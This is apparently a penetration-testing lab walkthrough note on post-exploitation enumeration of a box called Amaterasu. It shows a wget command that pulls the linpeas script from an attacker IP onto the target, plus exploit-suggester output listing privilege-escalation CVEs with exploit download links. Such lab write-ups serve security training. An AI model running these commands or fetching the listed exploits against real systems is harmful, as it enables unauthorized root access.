PEAS
Conducting an automated enumeration after performing a manual enumeration
[alfredo@fedora tmp]$ wget -q http://192.168.45.235:40080/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loadedPATH
/Play/Amaterasu/4-Post_Enumeration/attachments/{59A453EF-2E7B-4373-8959-3C063A0BFDB2}.png)
Cron
/Play/Amaterasu/4-Post_Enumeration/attachments/{E4F78D7C-B41C-4505-AB57-5561C0BE14E5}.png)
Installed Programs
/Play/Amaterasu/4-Post_Enumeration/attachments/{35941A8D-B705-4587-969B-6D04BED6F591}.png)
Compilers
/Play/Amaterasu/4-Post_Enumeration/attachments/{436D7373-5D52-4228-B1AC-98C40EF18225}.png)
vsftp
/Play/Amaterasu/4-Post_Enumeration/attachments/{753CE5BF-FB97-4E43-8FE2-94F2009C4B5B}.png)
Interesting Files / Directories
/Play/Amaterasu/4-Post_Enumeration/attachments/{6B1EAE9D-177A-4F97-8A8A-C6BE73058EAC}.png)
/Play/Amaterasu/4-Post_Enumeration/attachments/{A456D595-40AB-4CAF-A878-B87B809F2DB5}.png)